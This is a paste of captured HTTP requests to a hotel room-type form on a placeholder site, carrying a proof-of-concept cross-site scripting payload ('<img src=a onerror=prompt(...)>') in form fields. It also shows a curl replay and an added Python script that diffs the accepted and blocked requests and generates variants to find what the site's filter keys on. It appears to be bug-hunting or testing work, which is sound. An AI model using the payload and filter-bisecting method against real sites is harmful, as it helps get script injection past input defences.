Untitled

a guest
May 5th, 2021
POST /room_types/9378 HTTP/1.1
Host: xyz.com
Connection: close
Content-Length: 2305
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://xyz.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuLcZiHUcx5FLD1A8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xyz.com/room_types/edit/9378
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Cookie: {{redacted}}
x-browser: Chrome

------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[code]"

JRS
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="pms-code"


------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[secondary_pms_codes][]"

<img src=a onerror=>
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[secondary_pms_codes][]"

<img src=a onerror=prompt(`IW`)>
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[number_of_rooms]"

0
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[_localized][EN][name]"

Junior Suite<img src=a>
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[_localized][EN][description]"

<ul><li>Located on the top floor with a <strong>private balcony and amazing city views</strong></li><li>Enjoy more space with <strong>70 sqm</strong> of living space.</li><li><strong>Separate living room</strong> with comfortable couch.</li><li><strong>Luxury double beds</strong> with down duvets for maximum sleep comfort.</li></ul>
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[_localized][DE][name]"

Junior Suite<img src=a>
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[_localized][DE][description]"

<p>• Genießen Sie mehr Platz mit 70 m² Wohnfläche.</p><p>• Separates Wohnzimmer mit bequemer Couch</p><p>• Luxus-Doppelbetten mit Daunendecken für maximalen Schlafkomfort.</p><p>• Zimmer auf der obersten Etage mit eigenem Balkon und herrlichem Blick</p>
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[picture][]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[picture_position][16962]"

1
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[picture_position][16959]"

2
------WebKitFormBoundaryuLcZiHUcx5FLD1A8
Content-Disposition: form-data; name="room_type[picture_position][16960]"

3
------WebKitFormBoundaryuLcZiHUcx5FLD1A8--

I tried myself and the request was accepted too.

I then tried to submit the same string through the interface and it got blocked. If I capture the request with Chrome dev tools and try to resubmit, I still get blocked.

curl 'https://xyz.com/room_types/9378' \
-H 'authority: xyz.com' \
-H 'cache-control: max-age=0' \
-H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'upgrade-insecure-requests: 1' \
-H 'origin: https://xyz.com' \
-H 'content-type: multipart/form-data; boundary=----WebKitFormBoundaryBUFTMuBVsE7P1UZv' \
-H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' \
-H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H 'sec-fetch-site: same-origin' \
-H 'sec-fetch-mode: navigate' \
-H 'sec-fetch-user: ?1' \
-H 'sec-fetch-dest: document' \
-H 'referer: https://xyz.com/room_types/edit/9378' \
-H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7,es;q=0.6,de;q=0.5' \
-H 'cookie: {{redacted}}' \
--data-raw $'------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[code]"\r\n\r\nJRS\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="pms-code"\r\n\r\n\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[secondary_pms_codes][]"\r\n\r\n<img src=a onerror=prompt(`IW`)>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[number_of_rooms]"\r\n\r\n0\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][EN][name]"\r\n\r\nJunior Suite<img src=a>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][EN][description]"\r\n\r\n<ul><li>Located on the top floor with a <strong>private balcony and amazing city views</strong></li><li>Enjoy more space with <strong>70 sqm</strong> of living space.</li><li><strong>Separate living room</strong> with comfortable couch.</li><li><strong>Luxury double beds</strong> with down duvets for maximum sleep comfort.</li></ul>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][DE][name]"\r\n\r\nJunior Suite<img src=a>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[_localized][DE][description]"\r\n\r\n<p>• Genießen Sie mehr Platz mit 70 m² Wohnfläche.</p><p>• Separates Wohnzimmer mit bequemer Couch</p><p>• Luxus-Doppelbetten mit Daunendecken für maximalen Schlafkomfort.</p><p>• Zimmer auf der obersten Etage mit eigenem Balkon und herrlichem Blick</p>\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture][]"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16962]"\r\n\r\n1\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16959]"\r\n\r\n2\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv\r\nContent-Disposition: form-data; name="room_type[picture_position][16960]"\r\n\r\n3\r\n------WebKitFormBoundaryBUFTMuBVsE7P1UZv--\r\n' \
--compressed
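The paste shows the same payload being accepted when replayed from Burp and blocked when sent from the UI or replayed from Chrome's "copy as cURL" output, so the practical next step is to find out exactly what the two requests differ in and then replay one change at a time. The script below is an added example (the editor's, not code from the paste's author or from the target application): it serialises a multipart/form-data POST with the CRLF framing a browser uses, parses a raw HTTP/1.1 capture back into headers and ordered form fields, diffs two captures while ignoring per-request noise (the boundary, Content-Length, the redacted cookie), and generates one-header-removed variants for bisecting the block. The two embedded requests are constructed, shortened copies of the page's captures (descriptions, picture parts, client-hint headers and the cookie dropped; Chrome's `authority` pseudo-header written as Host); the path, header names and field names are the page's own, and nothing is sent anywhere.

```python
"""Build, parse, diff and bisect captured multipart/form-data requests (added example)."""
import re
from typing import Dict, Iterator, List, Tuple

Fields = List[Tuple[str, str]]
PATH = "/room_types/9378"
IGNORED = {"content-length", "cookie"}  # client-computed / redacted on the page

# Constructed from the page's Burp capture (the request that was accepted).
ACCEPTED_HEADERS = {
    "Host": "xyz.com", "Connection": "close", "Origin": "https://xyz.com",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
    "Referer": "https://xyz.com/room_types/edit/9378",
    "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.5",
    "x-browser": "Chrome",
}
ACCEPTED_FIELDS: Fields = [
    ("room_type[code]", "JRS"),
    ("pms-code", ""),
    ("room_type[secondary_pms_codes][]", "<img src=a onerror=>"),
    ("room_type[secondary_pms_codes][]", "<img src=a onerror=prompt(`IW`)>"),
    ("room_type[number_of_rooms]", "0"),
    ("room_type[_localized][EN][name]", "Junior Suite<img src=a>"),
]
# Constructed from the page's "copy as cURL" capture (the request that was blocked);
# Chrome's ':authority' pseudo-header is written as Host for HTTP/1.1.
BLOCKED_HEADERS = {
    "Host": "xyz.com", "Origin": "https://xyz.com",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
    "Referer": "https://xyz.com/room_types/edit/9378",
    "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8,it;q=0.7,es;q=0.6,de;q=0.5",
}
# The curl version carried only the second secondary_pms_codes[] value.
BLOCKED_FIELDS: Fields = [f for f in ACCEPTED_FIELDS if f[1] != "<img src=a onerror=>"]


def build_request(path: str, headers: Dict[str, str], fields: Fields, boundary: str) -> bytes:
    """Serialise a multipart/form-data POST as a browser would (CRLF on the wire)."""
    body = b"".join(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'.encode()
        for n, v in fields
    ) + f"--{boundary}--\r\n".encode()
    lines = [f"POST {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    lines += [f"Content-Type: multipart/form-data; boundary={boundary}", f"Content-Length: {len(body)}"]
    return "\r\n".join(lines).encode() + b"\r\n\r\n" + body


def parse_request(raw: bytes) -> Tuple[Dict[str, str], Fields]:
    """Split a raw HTTP/1.1 capture into lower-cased headers and ordered form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.decode().split("\r\n")[1:]:  # [0] is the request line
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    m = re.search(r"boundary=([^;\s]+)", headers.get("content-type", ""))
    if not m:
        raise ValueError("not a multipart/form-data request")
    fields: Fields = []
    for part in body.split(b"--" + m.group(1).encode()):
        if part == b"" or part.startswith(b"--"):  # preamble / closing delimiter
            continue
        part = part.removeprefix(b"\r\n").removesuffix(b"\r\n")
        part_head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_head.decode())
        if name:  # file parts also carry filename=; name= comes first in the header
            fields.append((name.group(1), value.decode()))
    return headers, fields


def diff_requests(a: bytes, b: bytes):
    """Return ({header: (a, b)}, {field: ([a values], [b values])}) for what differs."""
    def norm(v):  # the boundary is fresh per request, so it is never the signal
        return re.sub(r";\s*boundary=\S+", "", v) if v else v
    def by_name(fields: Fields) -> Dict[str, List[str]]:
        grouped: Dict[str, List[str]] = {}
        for n, v in fields:
            grouped.setdefault(n, []).append(v)  # repeated names (foo[]) keep every value
        return grouped
    (ha, fa), (hb, fb) = parse_request(a), parse_request(b)
    headers = {k: (norm(ha.get(k)), norm(hb.get(k)))
               for k in sorted((set(ha) | set(hb)) - IGNORED) if norm(ha.get(k)) != norm(hb.get(k))}
    ga, gb = by_name(fa), by_name(fb)
    fields = {n: (ga.get(n), gb.get(n)) for n in sorted(set(ga) | set(gb)) if ga.get(n) != gb.get(n)}
    return headers, fields


def header_bisect(headers: Dict[str, str], fields: Fields, boundary: str) -> Iterator[Tuple[str, bytes]]:
    """Yield (dropped header, request): replay each and note which removal flips the verdict."""
    for k in headers:
        if k.lower() != "host":  # a request without Host fails for unrelated reasons
            yield k, build_request(PATH, {h: v for h, v in headers.items() if h != k}, fields, boundary)


ACCEPTED_RAW = build_request(PATH, ACCEPTED_HEADERS, ACCEPTED_FIELDS, "----WebKitFormBoundaryuLcZiHUcx5FLD1A8")
BLOCKED_RAW = build_request(PATH, BLOCKED_HEADERS, BLOCKED_FIELDS, "----WebKitFormBoundaryBUFTMuBVsE7P1UZv")

if __name__ == "__main__":
    header_diff, field_diff = diff_requests(ACCEPTED_RAW, BLOCKED_RAW)
    for k, (a, b) in {**header_diff, **field_diff}.items():
        print(f"{k}: accepted={a!r} blocked={b!r}")
```

Run as a script it prints the differences between the two constructed captures: Connection, Accept-Encoding and x-browser are present only in the accepted request, User-Agent and Accept-Language differ, and the accepted request carried two `room_type[secondary_pms_codes][]` values where the curl replay carried one. To bisect, feed each variant from `header_bisect` through the same proxy or a raw socket and watch which removal changes the response; the page does not say which of these differences the filter keys on, and the script only narrows the candidates.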